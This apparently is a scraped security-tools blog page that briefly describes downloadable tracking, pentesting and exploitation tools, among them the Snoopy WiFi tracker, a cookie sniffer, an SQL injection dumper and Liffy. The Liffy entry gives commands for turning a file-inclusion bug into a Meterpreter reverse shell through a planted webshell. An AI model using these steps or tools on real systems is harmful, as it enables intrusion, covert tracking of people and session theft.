6:26 AM EN, Linux, Profiling Framework, Python, Snoopy, Tracking Framework

Snoopy is a distributed tracking and profiling framework which can perform interesting tracking and profiling of mobile users through the use of WiFi.

There have been recent initiatives from numerous governments to legalise the monitoring of citizens’ Internet based communications (web sites visited, emails, social media) under the guise of anti-terrorism.

Several private organisations have developed technologies claiming to facilitate the analysis of collected data with the goal of identifying undesirable activities. Whether such technologies are used to identify such activities, or rather to profile all citizens, is open to debate. Budgets, technical resources, and PhD level staff are plentiful in this sphere. This inspired the goal of the Snoopy project: with the limited time and resources of a few technical minds could we create our own distributed tracking and data interception framework with functionality for simple analysis of collected data.

Snoopy consists of four components:

Client software (aka Snoopy Drone software)
Server software
Web interface
Maltego transforms

Plug-ins

Plug-ins consist of two parts:

Back-end (data providing) part, written in Python
Front-end (displaying) part, written in JavaScript (optional)

Requirements

Ubuntu 12.04 LTS 32bit online server
One or more Linux based client devices with internet connectivity and a WiFi device supporting injection drivers. We’d recommend the Nokia N900.
A copy of Maltego Radium

Web Interface: You can access the web interface via http://yoursnoopyserver:5000/. You can write your own data exploration plugins. Check the Appendix of the README file for more info on that.

Download Snoopy

sb0x-project - A simple and Lightweight framework for Penetration testing

11:45 AM EN, Lightweight framework, Linux, Python, sb0x, sb0x-project

sb0x-project is A Lightweight Framework for PenTesting Written in Python

Platforms:

Linux
BSD
"Or Unix System"

Download sb0x

Bing Heartbleed Scan - Tool to extract sites from a bing search and check if are vulnerables

2:58 PM Bing Heartbleed Scan, EN, Heartbleed, Linux, Scan, Scanner

A simple scan in bash to extract sites from a bing search and check if is vulnerable.

Download Bing Heartbleed Scan

ByWaf - Web Application Penetration Testing Framework

12:57 PM ByWaf, EN, Linux, Python, WAPTF, Web Application Penetration Testing Framework

ByWaf is a Web Application Penetration Testing Framework (WAPTF). It consists of a command-line interpreter and a set of plugins. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License.

The Bywaf application is built on Python’s built-in cmd.Cmd class. Cmd is a lightweight command interpreter loop that provides several useful facilities for the developer, including overridable hook methods and easy addition of commands and help. For the user, it offers commandline editing with readline, including automatic tab completion of commands, command options and filenames.

Bywaf contains a sub-classed version of Cmd called Wafterpreter, which adds some important additions, including:

Loading and selecting plugins.
Getting and setting global and per-plugin options.
Additional methods exposing functionality to the plugins.
Backgrounding jobs, ending running jobs and querying job status.
Loading scripts from the the command-line or within the interpreter.
Loading, saving, showing and clearing the command history.

Wafterpreter API and utility methods:

The Wafterpreter API encompasses methods used by both the plugins as well as the Wafterpreter’s own methods; this allows for plugins to refining its behavior by assigning their own methods in their place.

Utility methods are time-saving shortcuts; while the API methods are the preferred way to change the interpreter’s behavior and to perform queries for jobs.

filename_completer(): a utility method and API that when given a set of starting and ending indices of the current word under the command-line cursor, returns the available filenames the word matches. This parameters to this method are supplied to completion methods, which can in turn pass them to this method.
get_job(): this utility method retrieves a Futures instace from the Wafterpreter’s internal list of completed and running jobs, given its job ID. This is useful in querying information about individual jobs (see do_kill() for an example).
finished_job_callback(): This overridable method is called upon the completion of a backgrounded job. It is used by the onecmd() method to notify the user when a backgrounded job has finished.
set_prompt(): an API method for setting the prompt to reflect a new plugin name.
get_history_item(): an API method returning the command history.
save_history(): an API method for saving the command history to a file.
load_history(): an API method for loading the command history from a file.
clear_history(): an API method for clearing the command history.
load_module(): a private low-level method for loading modules. Gets called by do_use(). There should not be a reason for its use outside that method.

Download ByWaf

WebCookiesSniffer - Capture Web site cookies

11:15 AM Capture Cookies, Cookies, EN, Sniffer, Sniffing, Web site cookies, WebCookiesSniffer, Windows

WebCookiesSniffer is a packet sniffer tool that captures all Web site cookies sent between the Web browser and the Web server and displays them in a simple cookies table. The upper pane of WebCookiesSniffer displays the cookie string and the Web site/host name that sent or received this cookie. When selecting a cookie string in the upper pane, WebCookiesSniffer parses the cookie string and displays the cookies as name-value format in the lower pane.

Download WebCookiesSniffer

RCEer - Simple Remote Command Execution scanner

12:18 PM EN, Linux, Mac, Python, RCEer, Remote Command Execution, Scanner, Windows

Simple Remote Command Execution scanner written in Python 2.7

Download RCEer

Bro - Passive Open-Source Network Traffic Analyzer

1:34 PM Bro, EN, Linux, Network Traffic Analyzer, Passive Network Traffic Analyzer

While focusing on network security monitoring, Bro provides a comprehensive platform for more general network traffic analysis as well. Well grounded in more than 15 years of research, Bro has successfully bridged the traditional gap between academia and operations since its inception. Today, it is relied upon operationally in particular by many scientific environments for securing their cyberinfrastructure. Bro’s user community includes major universities, research labs, supercomputing centers, and open-science communities.

Bro is a passive, open-source network traffic analyzer. It is primarily a security monitor that inspects all traffic on a link in depth for signs of suspicious activity. More generally, however, Bro supports a wide range of traffic analysis tasks even outside of the security domain, including performance measurements and helping with trouble-shooting.

Features

Deployment

Runs on commodity hardware on standard UNIX-style systems (including Linux, FreeBSD, and MacOS).
Fully passive traffic analysis off a network tap or monitoring port.
Standard libpcap interface for capturing packets.
Real-time and offline analysis.
Cluster-support for large-scale deployments.
Unified management framework for operating both standalone and cluster setups.
Open-source under a BSD license.

Analysis

Comprehensive logging of activity for offline analysis and forensics.
Port-independent analysis of application-layer protocols.
Support for many application-layer protocols (including DNS, FTP, HTTP, IRC, SMTP, SSH, SSL).
Analysis of file content exchanged over application-layer protocols, including MD5/SHA1 computation for fingerprinting.
Comprehensive IPv6 support.
Tunnel detection and analysis (including Ayiya, Teredo, GTPv1). Bro decapsulates the tunnels and then proceeds to analyze their content as if no tunnel was in place.
Extensive sanity checks during protocol analysis.
Support for IDS-style pattern matching.

Scripting Language

Turing-complete language for expression arbitrary analysis tasks.
Event-based programming model.
Domain-specific data types such as IP addresses (transparently handling both IPv4 and IPv6), port numbers, and timers.
Extensive support for tracking and managing network state over time.

Interfacing

Default output to well-structured ASCII logs.
Alternative backends for ElasticSearch and DataSeries. Further database interfaces in preparation.
Real-time integration of external input into analyses. Live database input in preparation.
External C library for exchanging Bro events with external programs. Comes with Perl, Python, and Ruby bindings.
Ability to trigger arbitrary external processes from within the scripting language.

Download Bro

Simple SQLi Dumper v5.1 - Tool to find bugs, errors or vulnerabilities in MySQL database

12:12 PM Brute Table & Column, Dump Database, EN, Extract Database Schema, Linux, Mac, Perl, Simple SQLi Dumper, SQL Injection, SQLi, Windows

SSDp is an usefull penetration tool to find bugs, errors or vulnerabilities in MySQL database.

Functions

SQL Injection
Operation System Function
Dump Database
Extract Database Schema
Search Columns Name
Read File (read only)
Create File (read only)
Brute Table & Column

Download Simple SQLi Dumper v5.1

Liffy - Local File Inclusion Exploitation Tool

1:52 PM EN, LFI, LFI Exploitation Tool, Liffy, Linux, Local File Inclusion, Metasploit, Meterpreter, Windows

Liffy is a tool written in Python designed to exploit local file inclusion vulnerabilities using three different techniques that will get you a working web shell. The first two make use of the built-in PHP wrappers php://input and data://. The third makes use of the process control extension called 'expect'.

For those unfamiliar I've included some links that highlight the usage of these techniques in LFI exploitation.

Exploitation

Once you have found an local file inclusion vulnerability, you simply point liffy at its location and select which technique you want to use.

./liffy --url http://target/vuln/file.php?= --data

The tool will create a PHP Meterpreter payload using msfpayload and drop it into your /tmp directory. It will then attempt to use the PHP wrapper to download the generated shell which you should have hosted by either using Node or Python's HTTP web servers.

http-server /tmp -p 8000

If all this works you should see a GET request to your shell, which is then downloaded to the working directory on the target webserver. From there a Metasploit resource file is created for you to spawn up a listening handler for inbound connections from the reverse PHP Meterpreter.

msfconsole -r php_listener.rc

Now you simply curl the location of your webshell and you should get see a new Meterpreter session spawn

curl --silent http://target/vuln/7ka0tqsq.php

Download Liffy

Sayfalar

Features

Features

Usage

Basic

Username enumeration only

Aggresive

Custom

Technical Description

ARGUMENTS

USAGE

Using HashMyFiles

PAExec - The Redistributable PsExec

Examples

Added Features:

Installation

Sample Usage

Exploitation

Social Profiles

Tổng số lượt xem trang

Người theo dõi

Translate

Xem Nhiều Nhất

Labels

Blog Archive

Blog Archive

Blogger news

Banner 2